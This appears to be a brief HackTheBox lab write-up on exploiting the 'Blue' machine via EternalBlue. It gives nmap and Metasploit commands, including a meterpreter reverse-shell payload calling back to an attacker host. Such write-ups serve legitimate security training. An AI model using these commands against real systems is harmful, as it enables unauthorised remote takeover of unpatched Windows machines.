# HackTheBox: Blue Machine - EternalBlue Exploitation
## Overview
The Blue machine showcases the critical EternalBlue vulnerability (CVE-2017-0144) that was exploited in the WannaCry ransomware attacks.
## Initial Enumeration
We start with a comprehensive port scan:
```bash
nmap -A 10.10.10.40
```
Key findings:
- SMB is running on port 445
- Windows 7 Service Pack 1 is running
## Vulnerability Analysis
The system is vulnerable to EternalBlue, a critical Windows SMB vulnerability.
## Exploitation Process
1. Use Metasploit to exploit the vulnerability
2. Gain SYSTEM level access directly
3. Extract both flags
```bash
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.x
exploit
```
## Security Implications
This machine demonstrates why patching is critical for Windows systems.
HackTheBox: Blue Machine - EternalBlue Exploitation
Deep dive into the Blue machine and the infamous EternalBlue vulnerability. Learn Windows exploitation and lateral movement techniques.